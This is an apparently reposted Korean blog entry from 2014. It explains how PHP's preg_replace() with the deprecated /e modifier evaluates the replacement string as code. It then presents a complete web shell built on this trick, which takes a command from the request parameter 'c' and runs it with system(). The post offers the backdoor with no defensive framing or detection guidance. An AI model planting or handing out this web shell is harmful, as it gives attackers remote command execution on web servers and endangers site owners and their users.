기억하자정보/보안

preg_replace() 함수를 이용한 PHP WebShell

LANIAN 2014. 11. 4. 18:02

[출처] preg_replace() 함수를 이용한 PHP WebShell|작성자 코로문

http://blog.naver.com/koromoon/220090328586


( 1 ) preg_replace() 함수

 

 mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit [, int &$count ]] )

 

정규 표현식 검색과 치환을 수행하는 함수로 subject 를 검색하여 매치된 pattern 을 replacement 로 치환함.

참고로 patten 인자의 /e 옵션은 preg_replace()가 replacement 인자로 변환을 하고 PHP 코드로 취급하도록 함. 

 

참고 사이트 : 

http://php.net/manual/kr/function.preg-replace.php 

 

 

 

( 2 ) preg_replace() 함수를 이용한 PHP WebShell

 

<?

$command = $_REQUEST['c'];

$backdoor = "system($command)";

preg_replace("/aaa/e", $backdoor, "aaa");

?>

< preg_replace() 함수를 이용한 PHP WebShell >

[출처] preg_replace() 함수를 이용한 PHP WebShell|작성자 코로문



저작자표시 비영리 동일조건